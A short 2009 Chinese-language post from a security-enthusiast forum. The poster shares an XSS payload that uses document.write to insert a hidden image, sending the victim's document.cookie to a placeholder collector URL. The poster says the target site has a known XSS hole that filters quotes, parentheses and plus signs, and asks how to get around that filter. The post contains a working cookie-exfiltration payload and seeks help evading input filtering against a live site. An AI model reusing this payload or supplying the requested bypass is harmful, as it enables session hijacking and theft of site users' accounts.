Board logo

标题: 求教部分过滤的XSS脚本攻击解决办法 [打印本页]

作者: FirePan    时间: 2009-5-8 15:42     标题: 求教部分过滤的XSS脚本攻击解决办法

<!--        <script>document.write('<img src="http://url/news.asp?msg='+document.cookie+'" width=0 height=0 border=0 />');</script>            -->
用以上语句获取COOKIE时,' () +被过滤了,是否有办法突破?(已知有XSS漏洞)
只用<img。。。。。。。。/>这段能否达到目的?与加上JS的语句有什么区别?




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./) Powered by Discuz! 7.2